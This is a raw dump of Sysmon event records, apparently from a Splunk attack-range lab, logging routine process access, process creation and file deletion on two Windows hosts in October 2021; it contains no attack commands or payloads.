10341000x800000000000000081385Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B24B-615A-4601-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081384Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B24B-615A-4601-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081383Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.806{2FDD8D40-B24B-615A-4601-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081382Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.789{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C729355C1384E2667BD8E795EA7C3D2,SHA256=FA28F80AEF1ADCF89DD170C248DB2042666F247DF240073B84BBC4FAE5C925CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081381Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.758{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8E4933F77DCEE23A86AF44A0168A2F7,SHA256=8C25D4BECBA126317EAE67A7BA8B99F30E2A6C9D461CEA053214B966F7FE6981,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103511Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.529{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419D6E906A35F8CD83B187F2A5D21116,SHA256=302A26DAD7CFD7DB2186F2C7BBCD71BD218B30E1CF823A4A06393E511C106902,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103510Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.466{58E9C193-ACA8-615A-1500-00000000FC01}11281436C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103509Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.435{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103508Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.435{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103507Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.435{58E9C193-AE68-615A-C800-00000000FC01}45484984C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103506Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.435{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103505Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.420{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103504Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.404{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103503Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.404{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103502Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.404{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103501Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.404{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103500Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.388{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103499Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.388{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103498Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.388{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103497Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.388{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103496Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.357{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103495Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.357{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103494Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.341{58E9C193-B24B-615A-CB01-00000000FC01}7126888C:\Windows\system32\conhost.exe{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103493Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.326{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103492Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.310{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103491Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.310{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103490Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.310{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103489Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.310{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103488Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.310{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103487Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.310{58E9C193-AE68-615A-C800-00000000FC01}45483372C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHELL32.dll+3d433|C:\Windows\System32\SHELL32.dll+3d2fb|C:\Windows\System32\SHELL32.dll+3cc17|C:\Windows\System32\SHELL32.dll+3c8dc|C:\Windows\System32\SHELL32.dll+e2157|C:\Windows\System32\SHELL32.dll+e20b5 154100x8000000000000000103486Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:35.323{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000103515Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:36.530{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25B4B668EC27DB50480A409BE52C8F2F,SHA256=E08B85BB885D0ADEB81FC9231432068DB5AC28640330B47487E5DDF55B5E3A78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081411Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.812{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=194D703A57CFB9C798EEEEF3E8631F61,SHA256=1FC860FB3E0430E1893C99E39E438A87A326EBFE34F1432EF0AE434C59E895BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081410Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.780{2FDD8D40-B24C-615A-4701-00000000FD01}10642568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081409Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:36.608{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B24C-615A-4701-00000000FD01}1064C:\Program 